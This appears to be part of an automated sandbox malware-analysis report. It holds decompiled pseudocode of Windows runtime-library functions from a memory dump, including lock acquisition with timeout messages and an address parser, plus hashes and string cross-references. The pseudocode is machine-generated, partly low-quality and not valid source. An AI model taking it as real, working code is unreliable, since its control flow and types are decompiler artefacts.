					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x01fa01c0;
									_push(_t92);
									_push(0);
									_t37 = E01EBF8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E01F04FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E01F13F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E01F13F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E01F4217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E01F13F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E01F03915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E01EE5384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E01EBF970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E01F03915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E01EBF970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E01F03915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E01EBF970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E01F03915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E01EE5329(_t74, _t92);
													_push(1);
													_t48 = E01EE53A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                              0x01ee53ab
                                                              0x01ee53ae
                                                              0x01ee53b1
                                                              0x01ee53b4
                                                              0x01ee53b7
                                                              0x01f005b6
                                                              0x01f005c0
                                                              0x01f005c3
                                                              0x00000000
                                                              0x01f005c9
                                                              0x01f005c9
                                                              0x01f005cc
                                                              0x01f005d5
                                                              0x01f005d5
                                                              0x01ee53bd
                                                              0x01ee53bd
                                                              0x01ee53bd
                                                              0x01ee53be
                                                              0x01ee53be
                                                              0x01ee53be
                                                              0x01ee53c0
                                                              0x00000000
                                                              0x00000000
                                                              0x01f22269
                                                              0x01f2226d
                                                              0x01f22349
                                                              0x01f2234d
                                                              0x01f22273
                                                              0x01f22276
                                                              0x01f22279
                                                              0x01f2227e
                                                              0x01f22283
                                                              0x01f22287
                                                              0x01f2228a
                                                              0x01f2228d
                                                              0x01f2228f
                                                              0x01f222bc
                                                              0x01f222bc
                                                              0x01f222bc
                                                              0x01f222be
                                                              0x01f222c4
                                                              0x01f222cc
                                                              0x01f222d0
                                                              0x01f222d6
                                                              0x01f222d7
                                                              0x01f222da
                                                              0x01f222df
                                                              0x01f222e4
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222e6
                                                              0x01f222e9
                                                              0x01f222f4
                                                              0x01f222f9
                                                              0x01f222fa
                                                              0x01f22305
                                                              0x01f22314
                                                              0x01f22319
                                                              0x01f2231a
                                                              0x01f2231d
                                                              0x01f22320
                                                              0x01f22323
                                                              0x01f22323
                                                              0x01f22328
                                                              0x01f2232d
                                                              0x01f2232f
                                                              0x01f22331
                                                              0x01f22336
                                                              0x01f22336
                                                              0x01f2233b
                                                              0x01f2233d
                                                              0x01f22350
                                                              0x01f22351
                                                              0x01f22356
                                                              0x01f22359
                                                              0x01f22359
                                                              0x01f2235b
                                                              0x01f2235d
                                                              0x01ee5367
                                                              0x01ee536b
                                                              0x01ee5372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f22363
                                                              0x01f22363
                                                              0x01f22369
                                                              0x01f2236a
                                                              0x01f2236c
                                                              0x01f22371
                                                              0x01f22373
                                                              0x00000000
                                                              0x01f22379
                                                              0x01f22379
                                                              0x01f2237a
                                                              0x01f2237f
                                                              0x01f2237f
                                                              0x01f22385
                                                              0x01f22386
                                                              0x01f22389
                                                              0x01f2238e
                                                              0x01f22390
                                                              0x01ee5378
                                                              0x01ee537c
                                                              0x01f22396
                                                              0x01f22396
                                                              0x01f22397
                                                              0x01f2239c
                                                              0x01f223a2
                                                              0x01f223a3
                                                              0x01f223a6
                                                              0x01f223ab
                                                              0x01f223ad
                                                              0x00000000
                                                              0x01f223b3
                                                              0x01f223b3
                                                              0x01f223b4
                                                              0x01f223b9
                                                              0x01f223ba
                                                              0x01f223ba
                                                              0x01f223bc
                                                              0x01f223bf
                                                              0x00000000
                                                              0x00000000
                                                              0x01f19153
                                                              0x01f19158
                                                              0x01f1915a
                                                              0x01f1915e
                                                              0x01f19160
                                                              0x00000000
                                                              0x01f19166
                                                              0x01f19166
                                                              0x01f19171
                                                              0x01f19176
                                                              0x01f19176
                                                              0x00000000
                                                              0x01f19160
                                                              0x01f223c6
                                                              0x01f223cb
                                                              0x01f223ce
                                                              0x01f223d7
                                                              0x01f223d7
                                                              0x01f223ad
                                                              0x01f22390
                                                              0x01f22373
                                                              0x01f2233f
                                                              0x01f2233f
                                                              0x00000000
                                                              0x01f2233f
                                                              0x01f22291
                                                              0x01f22291
                                                              0x01f22293
                                                              0x01f22295
                                                              0x01f2229a
                                                              0x01f222a1
                                                              0x01f222a3
                                                              0x01f222a7
                                                              0x01f222a9
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222ab
                                                              0x01f222ad
                                                              0x01f222af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222af
                                                              0x01f222b1
                                                              0x01f222b4
                                                              0x01f222b4
                                                              0x01f222b6
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f222b6
                                                              0x01f2228f
                                                              0x00000000
                                                              0x01f2226d
                                                              0x01ee53cb
                                                              0x01ee53ce
                                                              0x01ee53d0
                                                              0x01ee53d4
                                                              0x01ee53d6
                                                              0x00000000
                                                              0x01ee53d8
                                                              0x01ee53e3
                                                              0x01ee53ea
                                                              0x01ee53ea
                                                              0x01ee53d6
                                                              0x00000000

                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01F222F4
                                                              Strings
                                                              • RTL: Re-Waiting, xrefs: 01F22328
                                                              • RTL: Resource at %p, xrefs: 01F2230B
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01F222FC
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-871070163
                                                              • Opcode ID: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                                              • Instruction ID: 2676c316be32f98c6a33fa45c197857e5991e8ff538bb23489f86f5229c9cf54
                                                              • Opcode Fuzzy Hash: 9030b1ca91d7373caab703923876553ddef5f38aff011300c8700d2809773c6b
                                                              • Instruction Fuzzy Hash: A4513A75600712ABEB15DF28CC80FAB73E8EF55324F104219FD05DB285EA72EC428790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EEEC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 51%
                                                              			E01EEEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01EDDA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x1fa793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01EC16C0(_t39);
				} else {
					_t40 = E01EBF9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01F03915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01EC01A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x1fa793c; // 0x0
								_push(_t85);
								_t44 = E01EC1F28(_t71);
							} else {
								_t44 = E01EBF8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01F03915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01F42306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01EEEC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01F04FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01F13F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01F13F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x1fa20c0;
								if(_t85 != 0x1fa20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01F4217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01F13F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                              0x01eeec56
                                                              0x01eeec56
                                                              0x01eeec56
                                                              0x01eeec5c
                                                              0x01eeec64
                                                              0x01f223e6
                                                              0x01f223eb
                                                              0x01f223eb
                                                              0x01eeec6a
                                                              0x01eeec6c
                                                              0x01eeec6f
                                                              0x01f223f3
                                                              0x01f223f8
                                                              0x01f223fa
                                                              0x01f223fc
                                                              0x01eeec75
                                                              0x01eeec76
                                                              0x01eeec76
                                                              0x01eeec7b
                                                              0x01eeec7c
                                                              0x01eeec7e
                                                              0x01f22406
                                                              0x01f22407
                                                              0x01f2240c
                                                              0x01f2240d
                                                              0x01f2240d
                                                              0x01f2240d
                                                              0x01f22414
                                                              0x01f22417
                                                              0x01f2241e
                                                              0x01f22435
                                                              0x01f22438
                                                              0x01f2243c
                                                              0x01f2243f
                                                              0x01f22442
                                                              0x01f22443
                                                              0x01f22446
                                                              0x01f22449
                                                              0x01f22453
                                                              0x01f22455
                                                              0x01f2245b
                                                              0x01f2245b
                                                              0x01eeeb99
                                                              0x01eeeb99
                                                              0x01eeeb9c
                                                              0x01eeeb9d
                                                              0x01eeeb9f
                                                              0x01eeeba2
                                                              0x01f22465
                                                              0x01f2246b
                                                              0x01f2246d
                                                              0x01eeeba8
                                                              0x01eeeba9
                                                              0x01eeeba9
                                                              0x01eeebae
                                                              0x01eeebb3
                                                              0x01eeebb9
                                                              0x01eeebbb
                                                              0x01f22513
                                                              0x01f22514
                                                              0x01f22519
                                                              0x01f2251b
                                                              0x01eeec2a
                                                              0x01eeec2d
                                                              0x01eeec33
                                                              0x01eeec36
                                                              0x01eeec3a
                                                              0x01eeec3e
                                                              0x01eeec40
                                                              0x01eeec47
                                                              0x01eeec47
                                                              0x01eeec40
                                                              0x01ec22c6
                                                              0x01eeebc1
                                                              0x01eeebc1
                                                              0x01eeebc5
                                                              0x01eeec9a
                                                              0x01eeec9a
                                                              0x01eeebd6
                                                              0x01eeebd6
                                                              0x00000000
                                                              0x01eeebbb
                                                              0x01f22477
                                                              0x01f2247c
                                                              0x01f22486
                                                              0x01f2248b
                                                              0x01f22496
                                                              0x01f2249b
                                                              0x01f2249d
                                                              0x01f224a0
                                                              0x01f224a3
                                                              0x01f224aa
                                                              0x01f224aa
                                                              0x01f224a5
                                                              0x01f224a5
                                                              0x01f224a5
                                                              0x01f224ac
                                                              0x01f224af
                                                              0x01f224b0
                                                              0x01f224b3
                                                              0x01f224b9
                                                              0x01f224ba
                                                              0x01f224bb
                                                              0x01f224c6
                                                              0x01f224cb
                                                              0x01f224cd
                                                              0x01f224d0
                                                              0x01f224d1
                                                              0x01f224d4
                                                              0x01f224d6
                                                              0x01f224d9
                                                              0x01f224d9
                                                              0x01f224dc
                                                              0x01f224df
                                                              0x01f224e1
                                                              0x01f224e7
                                                              0x01f224e9
                                                              0x01f224ec
                                                              0x01f224ef
                                                              0x01f224f2
                                                              0x01f224f2
                                                              0x01f224ef
                                                              0x01f224e7
                                                              0x01f224fa
                                                              0x01f224ff
                                                              0x01f22501
                                                              0x01f22503
                                                              0x01f22506
                                                              0x01f2250b
                                                              0x01eeeb8c
                                                              0x01eeeb93
                                                              0x00000000
                                                              0x00000000
                                                              0x01eeeb93
                                                              0x00000000
                                                              0x01eeeb99
                                                              0x01eeec85
                                                              0x01eeec85
                                                              0x01eeec85
                                                              0x00000000

                                                              Strings
                                                              • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01F224BD
                                                              • RTL: Re-Waiting, xrefs: 01F224FA
                                                              • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01F2248D
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                              • API String ID: 0-3177188983
                                                              • Opcode ID: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                                              • Instruction ID: be166d89fa138dcffe0919f3c4a71c7ff1e1083183e4923bd268fc9e0e40773d
                                                              • Opcode Fuzzy Hash: 9ccea7f5bb449148fd527f32cfe7821e1ee5d9b4c3fe9322d0f83ca74a6c0d5a
                                                              • Instruction Fuzzy Hash: 70411870A00215EBDB24DF68CD88FAE7BF8EF88720F108609F6559B2C1D736E9418761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EFFCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E01EFFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01EFEE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01EFEE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01EF685D(_t167, 4) == 0) {
								if(E01EF685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01EF685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01EF685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01ED8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01ECDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01EFEE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01EFEE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                              0x01effcd1
                                                              0x01effcd6
                                                              0x01effcd9
                                                              0x01effcdc
                                                              0x01effcdf
                                                              0x01effce2
                                                              0x01effce5
                                                              0x01effce8
                                                              0x01effceb
                                                              0x01effced
                                                              0x01effced
                                                              0x01effcf3
                                                              0x00000000
                                                              0x00000000
                                                              0x01effcfc
                                                              0x01effcfe
                                                              0x01effdc1
                                                              0x01f2ecbd
                                                              0x00000000
                                                              0x01f2eccc
                                                              0x01f2eccc
                                                              0x01f2ecd2
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2ecdf
                                                              0x01f2ece0
                                                              0x01f2ece4
                                                              0x01f2eceb
                                                              0x01f2ecee
                                                              0x01f2eca8
                                                              0x01f2eca8
                                                              0x01f2ecaa
                                                              0x01effd76
                                                              0x01effd79
                                                              0x01effdb4
                                                              0x01effdb5
                                                              0x01effdb6
                                                              0x00000000
                                                              0x01effdb6
                                                              0x01effd7e
                                                              0x01f2ecfc
                                                              0x01effe2f
                                                              0x00000000
                                                              0x01effe2f
                                                              0x01f2ed08
                                                              0x01f2ed0f
                                                              0x01f2ed17
                                                              0x01f2ed1b
                                                              0x00000000
                                                              0x01f2ed1b
                                                              0x01effd88
                                                              0x00000000
                                                              0x00000000
                                                              0x01effd94
                                                              0x01effd99
                                                              0x01effda1
                                                              0x00000000
                                                              0x00000000
                                                              0x01effdb0
                                                              0x00000000
                                                              0x01effdb0
                                                              0x01f2ecbd
                                                              0x01effdc7
                                                              0x01effdcb
                                                              0x00000000
                                                              0x01effdd7
                                                              0x01effde3
                                                              0x01effe06
                                                              0x01f11fe7
                                                              0x00000000
                                                              0x00000000
                                                              0x01f11fef
                                                              0x01f11ff0
                                                              0x01f11ff4
                                                              0x01f11ff7
                                                              0x01f11ffa
                                                              0x01f11ffd
                                                              0x01f12000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2ecf1
                                                              0x00000000
                                                              0x01f2ecf1
                                                              0x00000000
                                                              0x01effe06
                                                              0x01effde8
                                                              0x01effdec
                                                              0x01effdef
                                                              0x01effdf2
                                                              0x00000000
                                                              0x01effdf2
                                                              0x01effdcb
                                                              0x01effd04
                                                              0x01effd05
                                                              0x01f2ec67
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2ec6f
                                                              0x00000000
                                                              0x01f2ec6f
                                                              0x01effd13
                                                              0x01effd3c
                                                              0x01effd40
                                                              0x01f2ec75
                                                              0x01f2ec7a
                                                              0x00000000
                                                              0x01f2ec8a
                                                              0x01f2ec8a
                                                              0x01f2ec90
                                                              0x01f2ecb2
                                                              0x01effd73
                                                              0x01effd73
                                                              0x00000000
                                                              0x01effd73
                                                              0x01f2ec95
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2eca1
                                                              0x01f2eca4
                                                              0x01f2eca5
                                                              0x00000000
                                                              0x01f2eca5
                                                              0x01f2ec7a
                                                              0x01effd4a
                                                              0x00000000
                                                              0x01effd6e
                                                              0x01effd6e
                                                              0x01effd71
                                                              0x00000000
                                                              0x01effd71
                                                              0x01effd4a
                                                              0x01effd21
                                                              0x01f0a3a1
                                                              0x00000000
                                                              0x01f0a3a1
                                                              0x01effd36
                                                              0x01f1200b
                                                              0x01f12012
                                                              0x00000000
                                                              0x00000000
                                                              0x01f12018
                                                              0x00000000
                                                              0x01f12018
                                                              0x00000000
                                                              0x01effd36
                                                              0x01effe0f
                                                              0x01effe16
                                                              0x01f0a3ad
                                                              0x00000000
                                                              0x00000000
                                                              0x01f0a3b3
                                                              0x01f0a3b3
                                                              0x01effe1f
                                                              0x01f2ed25
                                                              0x01f2ed86
                                                              0x00000000
                                                              0x00000000
                                                              0x01f2ed91
                                                              0x01f2ed95
                                                              0x01f2ed95
                                                              0x01f2ed9a
                                                              0x01f2edad
                                                              0x01f2edb3
                                                              0x01f2edba
                                                              0x01f2edc4
                                                              0x01f2edc9
                                                              0x00000000
                                                              0x01f2edcc
